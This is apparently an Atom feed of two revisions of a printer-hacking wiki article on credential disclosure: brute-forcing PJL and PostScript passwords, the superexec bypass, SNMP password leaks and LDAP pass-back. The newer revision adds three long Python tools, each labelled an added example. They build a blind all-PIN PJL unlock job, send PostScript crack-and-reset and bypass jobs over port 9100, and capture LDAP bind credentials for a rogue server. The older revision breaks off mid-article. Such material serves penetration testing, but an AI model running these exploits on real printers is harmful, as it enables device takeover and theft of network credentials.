<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>http://hacking-printers.net/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=92.228.38.179</id>
		<title>Hacking Printers - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="http://hacking-printers.net/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=92.228.38.179"/>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Special:Contributions/92.228.38.179"/>
		<updated>2026-06-22T12:45:31Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.26.4</generator>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Credential_disclosure&amp;diff=605</id>
		<title>Credential disclosure</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Credential_disclosure&amp;diff=605"/>
				<updated>2017-02-08T13:02:36Z</updated>
		
		<summary type="html">&lt;p&gt;92.228.38.179: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model-specific password disclosure.&lt;br /&gt;
&lt;br /&gt;
== Brute-Force Attacks ==&lt;br /&gt;
&lt;br /&gt;
Besides credentials leaked from sources like the [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited password protection mechanisms themselves. Breaking such mechanisms has priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model, they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers therefore have a motivation to crack or bypass them where necessary.&lt;br /&gt;
&lt;br /&gt;
=== PJL ===&lt;br /&gt;
&lt;br /&gt;
PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The PJL disk lock shown below is the defense mechanism advocated by HP against PJL file system access, including its known path traversal vulnerabilities &amp;lt;ref&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
 @PJL JOB PASSWORD=0&lt;br /&gt;
 @PJL DEFAULT PASSWORD=12345&lt;br /&gt;
 @PJL DEFAULT DISKLOCK=ON&lt;br /&gt;
 @PJL DEFAULT CPLOCK=ON&lt;br /&gt;
&lt;br /&gt;
PJL passwords, however, are vulnerable to brute-force attacks because of their limited 16 bit key size, as demonstrated by &amp;lt;ref&amp;gt;''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002&amp;lt;/ref&amp;gt;, who were able to unlock the disk protection within 6 hours in the worst case. PJL interpreters have become faster since, while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 &amp;lt;ref&amp;gt;''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21&amp;lt;/ref&amp;gt;, so cracking times have dropped considerably. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second, leading to average cracking times between 30 seconds and 10 minutes.&lt;br /&gt;
&lt;br /&gt;
While PJL passwords can be set on various devices, an actual disk lock and/or control panel lock is only supported by a few printers. It is unclear whether the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Furthermore, in violation of the PJL standard, Brother-based devices do not even verify the password when locking or unlocking the control panel, rendering it practically useless.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; lock 999&lt;br /&gt;
 PIN protection:  ENABLED&lt;br /&gt;
 Panel lock:      ON&lt;br /&gt;
 Disk lock:       ON&lt;br /&gt;
 printer:/&amp;gt; unlock&lt;br /&gt;
 No PIN given, cracking.&lt;br /&gt;
 PIN protection:  DISABLED&lt;br /&gt;
 Panel lock:      OFF&lt;br /&gt;
 Disk lock:       OFF&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.&lt;br /&gt;
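&lt;br /&gt;
The following is an added example, not code from this wiki or from PRET, showing how the blind variant works in practice: it builds one print job that contains a ''@PJL JOB PASSWORD=n'' envelope for every PIN from 1 to 65535, each followed by the ''DEFAULT'' commands that clear the password and both locks, so the one envelope carrying the right PIN resets the device while all others are ignored. The UEL/CRLF framing, the ''send_raw'' transport helper and the average-time estimate are assumptions of this example, not part of the page.&lt;br /&gt;
&lt;br /&gt;
```python
# Added example (not from the hacking-printers wiki or PRET): blind PJL unlock
# job covering the whole 16-bit key space in a single print job.
import socket

UEL = b"\x1b%-12345X"   # universal exit language: starts and ends a PJL job (assumed framing)
EOL = b"\r\n"


def unlock_envelope(pin):
    """One attempt: open a job with the candidate PIN, then clear the locks.

    With a wrong PIN the DEFAULT commands are ignored by the printer; with the
    right one the password is reset to 0 (disabled) and both locks go OFF."""
    return (b"@PJL JOB PASSWORD=%d" % pin + EOL
            + b"@PJL DEFAULT PASSWORD=0" + EOL
            + b"@PJL DEFAULT DISKLOCK=OFF" + EOL
            + b"@PJL DEFAULT CPLOCK=OFF" + EOL
            + b"@PJL EOJ" + EOL)


def build_blind_unlock_job(first=1, last=65535):
    """Concatenate envelopes for every PIN in [first, last] into one job.

    PJL passwords are integers 1..65535; 0 means 'no password set'."""
    if first not in range(1, 65536) or last not in range(first, 65536):
        raise ValueError("PJL PINs are integers in 1..65535")
    body = b"".join(unlock_envelope(pin) for pin in range(first, last + 1))
    return UEL + b"@PJL" + EOL + body + UEL


def expected_seconds(rate_per_second, key_space=65535):
    """Average time to hit a uniformly chosen PIN at a given verification rate."""
    return key_space / 2 / rate_per_second


def send_raw(host, job, port=9100, timeout=5.0):
    """Ship the job over raw port 9100 (assumed reachable); nothing is read back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(job)
        s.shutdown(socket.SHUT_WR)


if __name__ == "__main__":
    job = build_blind_unlock_job()
    print(len(job), "bytes,", job.count(b"@PJL JOB"), "attempts in one job")
    for rate in (50, 1000):
        print("%d PINs/s: about %.0f s on average" % (rate, expected_seconds(rate)))
```
&lt;br /&gt;
With the rates measured above the estimate reproduces the page's numbers (about 33 s at 1,000 PINs/s and about 11 minutes at 50 PINs/s). The generated job is a few megabytes; if a device drops the connection before it is consumed, send consecutive ''build_blind_unlock_job(first, last)'' slices instead.&lt;br /&gt;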
&lt;br /&gt;
=== PostScript ===&lt;br /&gt;
&lt;br /&gt;
PostScript offers two types of passwords: the ''SystemParamsPassword'' is required to change system parameters with ''setsystemparams'', while the ''StartJobPassword'' is required to exit the server loop (''startjob''/''exitserver'') and therefore permanently alter the PostScript environment. The ''checkpassword'' operator, which takes either an integer or a string as input, checks against both passwords at once &amp;lt;ref&amp;gt;''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194&amp;lt;/ref&amp;gt;. The key space is very large: PostScript strings can contain arbitrary 8-bit characters and have a maximum length of 65,535 &amp;lt;ref&amp;gt;''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739&amp;lt;/ref&amp;gt;, which theoretically allows 524,280 bit passwords. On the positive side (from an attacker's point of view), brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing numerical values as passwords is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
/min 0 def /max 1000000 def                % integer range to try&lt;br /&gt;
statusdict begin {                         % checkpassword is defined in statusdict&lt;br /&gt;
  min 1 max                                % for every candidate integer ...&lt;br /&gt;
  {dup checkpassword {== flush stop} {pop} ifelse} for  % ... print it and stop on a match&lt;br /&gt;
} stopped pop                              % the stop lands here without raising an error&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother-based devices are exceptions, as ''BR-Script'' accepts only one password attempt per second but also checks only the very first character of the password, which effectively limits the key space to 256 values or 8 bit. Apparently, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all.&lt;br /&gt;
&lt;br /&gt;
Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (&amp;lt;code&amp;gt;1183615869&amp;lt;/code&amp;gt;, see &amp;lt;ref&amp;gt;''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec &amp;amp; the pdfmark Instruction Set]'', D. Lancaster, 2002&amp;lt;/ref&amp;gt;). Wrapping PostScript code into ''superexec'' allows an attacker to ignore various protection mechanisms of the language which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without first submitting the current password, as shown below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
{ &amp;lt;&amp;lt; /SystemParamsPassword (0)                  % no /Password entry: under superexec the check is skipped&lt;br /&gt;
     /StartJobPassword (0) &amp;gt;&amp;gt; setsystemparams&lt;br /&gt;
} 1183615869 internaldict /superexec get exec  % the magic integer opens internaldict&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; lock 999&lt;br /&gt;
 printer:/&amp;gt; unlock&lt;br /&gt;
 No password given, cracking.&lt;br /&gt;
 Device unlocked with password: 999&lt;br /&gt;
 printer:/&amp;gt; lock S0me_Re4lly_g00d_Passw0rd!&lt;br /&gt;
 printer:/&amp;gt; unlock bypass&lt;br /&gt;
 Resetting password to zero with super-secret PostScript magic&lt;br /&gt;
 Device unlocked with password: 0&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can crack the password and reset it within the same print job, without ever reading the result.&lt;br /&gt;
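&lt;br /&gt;
As an added example (not part of this wiki or of PRET), the following Python builds the two PostScript jobs from this section as raw port 9100 jobs and reads back what the interpreter prints: a crack-and-reset job that, once ''checkpassword'' succeeds, immediately uses the value found as ''/Password'' in ''setsystemparams'' to reset both passwords to (0) within the same job, and the ''superexec'' bypass with a properly escaped PostScript string. The dictionaries are built with ''dict''/''put'' instead of the usual angle-bracket literals so that this listing carries no markup characters; the PJL framing, the EOT terminator, the ''Found password:'' marker and the helper names are assumptions of this example.&lt;br /&gt;
&lt;br /&gt;
```python
# Added example (not from the hacking-printers wiki or PRET): PostScript
# crack-and-reset and superexec bypass jobs, framed for raw port 9100.
import socket

UEL = b"\x1b%-12345X"      # assumed PJL framing around the PostScript job
PS_MAGIC = 1183615869      # static internaldict password quoted in the text


def ps_string(value):
    """Quote a Python str as a PostScript literal string, escaping backslash and parentheses."""
    escaped = value.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return "(" + escaped + ")"


# Braces are doubled because the template goes through str.format().
CRACK_AND_RESET = """%!PS
% Try every integer in [lo, hi]. On a hit: print it (== goes back over the
% connection), then use it as /Password to reset both passwords to (0) in the
% same job, so the attack also works blind.
statusdict begin
{{
  {lo} 1 {hi} {{
    dup checkpassword {{
      /found exch def
      (Found password: ) print found == flush
      3 dict dup /Password found 12 string cvs put
             dup /SystemParamsPassword (0) put
             dup /StartJobPassword (0) put
      setsystemparams
      stop
    }} {{ pop }} ifelse
  }} for
}} stopped pop
end
"""

SUPEREXEC_RESET = """%!PS
% Run setsystemparams inside superexec: without the current /Password this
% would normally raise invalidaccess.
{{
  2 dict dup /SystemParamsPassword {pw} put
         dup /StartJobPassword {pw} put
  setsystemparams
}} {magic} internaldict /superexec get exec
"""


def frame(postscript):
    """Wrap PostScript in a PJL job envelope (assumed framing, EOT terminated)."""
    return (UEL + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
            + postscript.encode("latin-1") + b"\x04" + UEL)


def crack_job(lo=0, hi=1000000):
    """Job that brute-forces integer passwords in [lo, hi] and resets them on success."""
    if lo not in range(hi + 1):
        raise ValueError("lo must lie between 0 and hi")
    return frame(CRACK_AND_RESET.format(lo=lo, hi=hi))


def bypass_job(new_password="0"):
    """Job that sets both passwords to new_password without knowing the old one."""
    return frame(SUPEREXEC_RESET.format(pw=ps_string(new_password), magic=PS_MAGIC))


def run_job(host, job, port=9100, timeout=60.0):
    """Send the job and collect what the RIP writes back (e.g. the == output)."""
    out = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(job)
        s.shutdown(socket.SHUT_WR)
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            out += chunk
    return out.decode("latin-1", "replace")


def found_password(output):
    """Integer from the 'Found password: N' line printed by the crack job, else None."""
    for line in output.splitlines():
        if line.startswith("Found password: "):
            return int(line.split(": ", 1)[1])
    return None
```
&lt;br /&gt;
The crack job is the blind form described above: the line printed by ''=='' is convenient for the operator but not required, because the reset happens inside the RIP. Very large ranges are better split into several jobs so that a single job stays below the device's job timeout.&lt;br /&gt;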
&lt;br /&gt;
== Password Disclosure ==&lt;br /&gt;
&lt;br /&gt;
=== SNMP ===&lt;br /&gt;
&lt;br /&gt;
Ancient HP printers (manufactured in 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to request (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP-based issues; penetration testers may find such flaws by studying the various publicly available MIBs released by printer manufacturers.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
To test this attack against ancient HP printers, the ''snmpget'' tool from the Net-SNMP suite can be used as shown below (the community string is assumed to be the default ''public''):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=sh&amp;gt;&lt;br /&gt;
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0&lt;br /&gt;
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable devices return the password as a hex string (here: ''AAA'' followed by NUL padding), while patched or newer devices respond with zero bytes only.&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can send network packets to port 161/udp of the printer device. &lt;br /&gt;
&lt;br /&gt;
=== Pass-Back ===&lt;br /&gt;
&lt;br /&gt;
Another interesting class of attacks are pass-back attacks, where ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ &amp;lt;ref&amp;gt;''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011&amp;lt;/ref&amp;gt;. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, then whenever someone (for example, the attacker) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers can harm more than the device itself once it is integrated into a company's network. Printers and MFPs, which often offer insufficient protection, are therefore a good starting point in network penetration tests.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
Check whether the embedded web server lets you change settings like the LDAP server address while the stored LDAP credentials are kept, then point the address at a host you control and trigger an authentication (for example by logging in at the device) to see whether the stored credentials arrive there.&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] attackers if the web application running on the printer has no CSRF protection.&lt;br /&gt;
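&lt;br /&gt;
The following added example (not code from this wiki, PRET or Net-SNMP) serves this section and the SNMP section above with one set of BER helpers: it builds the SNMPv1 GetRequest for HP's ''gdPasswords'' object and decodes the GetResponse, distinguishing a leaked password from the all-zero reply of fixed firmware, and it decodes the LDAP simple BindRequest that a redirected MFP sends, which is the packet a rogue LDAP listener captures in a pass-back attack. The OID and the community string are from the text; all sample packets are constructed here, and sending on 161/udp or listening on 389/tcp is left to the caller so that everything runs offline.&lt;br /&gt;
&lt;br /&gt;
```python
# Added example (not from the hacking-printers wiki, PRET or Net-SNMP): BER
# helpers, the gdPasswords GetRequest/GetResponse, and an LDAP simple-bind decoder.

GD_PASSWORDS_OID = "1.3.6.1.4.1.11.2.3.9.1.1.13.0"   # ...generalDeviceStatus.gdPasswords


def encode_tlv(tag, value):
    """BER tag-length-value, short or long definite-length form."""
    n = len(value)
    if n in range(128):
        length = bytes([n])
    else:
        body = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(body)]) + body
    return bytes([tag]) + length + value


def encode_int(n):
    size = max(1, (n.bit_length() + 8) // 8)   # +8 keeps the sign bit clear
    return encode_tlv(0x02, n.to_bytes(size, "big", signed=True))


def oid_bytes(dotted):
    """OBJECT IDENTIFIER content octets: first two arcs merged, base-128 afterwards."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc % 128]
        arc //= 128
        while arc:
            chunk.append(0x80 | (arc % 128))
            arc //= 128
        out.extend(reversed(chunk))
    return bytes(out)


def snmp_v1_message(community, pdu_tag, request_id, oid, value):
    """SNMPv1 message with one varbind; pdu_tag 0xa0 = GetRequest, 0xa2 = GetResponse."""
    varbind = encode_tlv(0x30, encode_tlv(0x06, oid_bytes(oid)) + value)
    pdu = encode_tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0)
                     + encode_tlv(0x30, varbind))
    return encode_tlv(0x30, encode_int(0) + encode_tlv(0x04, community.encode()) + pdu)


def gd_passwords_request(community="public", request_id=1):
    """The datagram to send to port 161/udp (NULL value, as snmpget does)."""
    return snmp_v1_message(community, 0xa0, request_id, GD_PASSWORDS_OID, encode_tlv(0x05, b""))


def decode_tlv(buf, pos=0):
    """Return (tag, content, position after the element) for the TLV at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    if first in range(128):
        length, pos = first, pos + 2
    else:
        k = first % 128                        # number of length octets
        length = int.from_bytes(buf[pos + 2:pos + 2 + k], "big")
        pos = pos + 2 + k
    return tag, buf[pos:pos + length], pos + length


def decode_children(buf):
    """Split the content of a constructed element into [(tag, content), ...]."""
    pos, items = 0, []
    while pos in range(len(buf)):
        tag, content, pos = decode_tlv(buf, pos)
        items.append((tag, content))
    return items


def gd_passwords_from_response(packet):
    """Password from a GetResponse, or None (error status, other OID, zero bytes only)."""
    tag, body, _ = decode_tlv(packet)
    if tag != 0x30:
        return None
    _, _, (pdu_tag, pdu) = decode_children(body)
    if pdu_tag != 0xa2:
        return None
    _, (_, status), _, (_, varbinds) = decode_children(pdu)
    if int.from_bytes(status, "big", signed=True) != 0:
        return None
    for _, vb in decode_children(varbinds):
        (_, oid), (vtag, value) = decode_children(vb)
        if oid == oid_bytes(GD_PASSWORDS_OID) and vtag == 0x04:
            text = value.split(b"\x00", 1)[0]  # fixed firmware answers with zero bytes only
            return text.decode("latin-1") if text else None
    return None


def simple_bind_credentials(packet):
    """(bind DN, password) from an LDAP simple BindRequest, or None for anything else."""
    tag, body, _ = decode_tlv(packet)
    if tag != 0x30:
        return None
    _, (op_tag, op) = decode_children(body)[:2]
    if op_tag != 0x60:                         # [APPLICATION 0] BindRequest
        return None
    _, (_, name), (auth_tag, auth) = decode_children(op)[:3]
    if auth_tag != 0x80:                       # [0] simple: password in the clear
        return None
    return name.decode("utf-8"), auth.decode("utf-8")


def constructed_bind_request(dn, password, message_id=1):
    """Constructed sample of what a redirected MFP sends first on port 389/tcp."""
    op = encode_int(3) + encode_tlv(0x04, dn.encode()) + encode_tlv(0x80, password.encode())
    return encode_tlv(0x30, encode_int(message_id) + encode_tlv(0x60, op))


if __name__ == "__main__":
    vulnerable = snmp_v1_message("public", 0xa2, 1, GD_PASSWORDS_OID,
                                 encode_tlv(0x04, b"AAA" + b"\x00" * 13))   # constructed reply
    print("gdPasswords:", gd_passwords_from_response(vulnerable))
    print("bind:", simple_bind_credentials(constructed_bind_request("cn=svc,dc=corp", "Passw0rd")))
```
&lt;br /&gt;
Behind a plain TCP accept loop on port 389, ''simple_bind_credentials'' applied to the first packet is all a rogue server needs, since the MFP presents its stored service account before any search. If the MFP binds via SASL or negotiates StartTLS instead, the function returns None and a fuller listener is required.&lt;br /&gt;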
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>92.228.38.179</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Credential_disclosure&amp;diff=575</id>
		<title>Credential disclosure</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Credential_disclosure&amp;diff=575"/>
				<updated>2017-02-08T10:31:37Z</updated>
		
		<summary type="html">&lt;p&gt;92.228.38.179: /* PostScript */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model-specific password disclosure.&lt;br /&gt;
&lt;br /&gt;
== Brute-Force Attacks ==&lt;br /&gt;
&lt;br /&gt;
Besides credentials leaked from sources like the [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited password protection mechanisms themselves. Breaking such mechanisms has priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model, they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers therefore have a motivation to crack or bypass them where necessary.&lt;br /&gt;
&lt;br /&gt;
=== PJL ===&lt;br /&gt;
&lt;br /&gt;
PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The PJL disk lock shown below is the defense mechanism advocated by HP against PJL file system access, including its known path traversal vulnerabilities &amp;lt;ref&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
 @PJL JOB PASSWORD=0&lt;br /&gt;
 @PJL DEFAULT PASSWORD=12345&lt;br /&gt;
 @PJL DEFAULT DISKLOCK=ON&lt;br /&gt;
 @PJL DEFAULT CPLOCK=ON&lt;br /&gt;
&lt;br /&gt;
PJL passwords, however, are vulnerable to brute-force attacks because of their limited 16 bit key size, as demonstrated by &amp;lt;ref&amp;gt;''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002&amp;lt;/ref&amp;gt;, who were able to unlock the disk protection within 6 hours in the worst case. PJL interpreters have become faster since, while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 &amp;lt;ref&amp;gt;''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21&amp;lt;/ref&amp;gt;, so cracking times have dropped considerably. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second, leading to average cracking times between 30 seconds and 10 minutes.&lt;br /&gt;
&lt;br /&gt;
While PJL passwords can be set on various devices, an actual disk lock and/or control panel lock is only supported by a few printers. It is unclear whether the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Furthermore, in violation of the PJL standard, Brother-based devices do not even verify the password when locking or unlocking the control panel, rendering it practically useless.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer pjl&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; lock 999&lt;br /&gt;
 PIN protection:  ENABLED&lt;br /&gt;
 Panel lock:      ON&lt;br /&gt;
 Disk lock:       ON&lt;br /&gt;
 printer:/&amp;gt; unlock&lt;br /&gt;
 No PIN given, cracking.&lt;br /&gt;
 PIN protection:  DISABLED&lt;br /&gt;
 Panel lock:      OFF&lt;br /&gt;
 Disk lock:       OFF&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.&lt;br /&gt;
&lt;br /&gt;
=== PostScript ===&lt;br /&gt;
&lt;br /&gt;
PostScript offers two types of passwords: the ''SystemParamsPassword'' is required to change system parameters with ''setsystemparams'', while the ''StartJobPassword'' is required to exit the server loop (''startjob''/''exitserver'') and therefore permanently alter the PostScript environment. The ''checkpassword'' operator, which takes either an integer or a string as input, checks against both passwords at once &amp;lt;ref&amp;gt;''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194&amp;lt;/ref&amp;gt;. The key space is very large: PostScript strings can contain arbitrary 8-bit characters and have a maximum length of 65,535 &amp;lt;ref&amp;gt;''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739&amp;lt;/ref&amp;gt;, which theoretically allows 524,280 bit passwords. On the positive side (from an attacker's point of view), brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing numerical values as passwords is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
/min 0 def /max 1000000 def                % integer range to try&lt;br /&gt;
statusdict begin {                         % checkpassword is defined in statusdict&lt;br /&gt;
  min 1 max                                % for every candidate integer ...&lt;br /&gt;
  {dup checkpassword {== flush stop} {pop} ifelse} for  % ... print it and stop on a match&lt;br /&gt;
} stopped pop                              % the stop lands here without raising an error&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother-based devices are exceptions, as ''BR-Script'' accepts only one password attempt per second but also checks only the very first character of the password, which effectively limits the key space to 256 values or 8 bit. Apparently, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all.&lt;br /&gt;
&lt;br /&gt;
'''How to test this attack?'''&lt;br /&gt;
&lt;br /&gt;
The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords:&lt;br /&gt;
&lt;br /&gt;
 ./pret.py -q printer ps&lt;br /&gt;
 Connection to printer established&lt;br /&gt;
 &lt;br /&gt;
 Welcome to the pret shell. Type help or ? to list commands.&lt;br /&gt;
 printer:/&amp;gt; lock 999&lt;br /&gt;
 printer:/&amp;gt; unlock&lt;br /&gt;
 No password given, cracking.&lt;br /&gt;
 Found password: 999&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.&lt;br /&gt;
&lt;br /&gt;
== Password Disclosure ==&lt;br /&gt;
&lt;br /&gt;
=== SNMP ===&lt;br /&gt;
&lt;br /&gt;
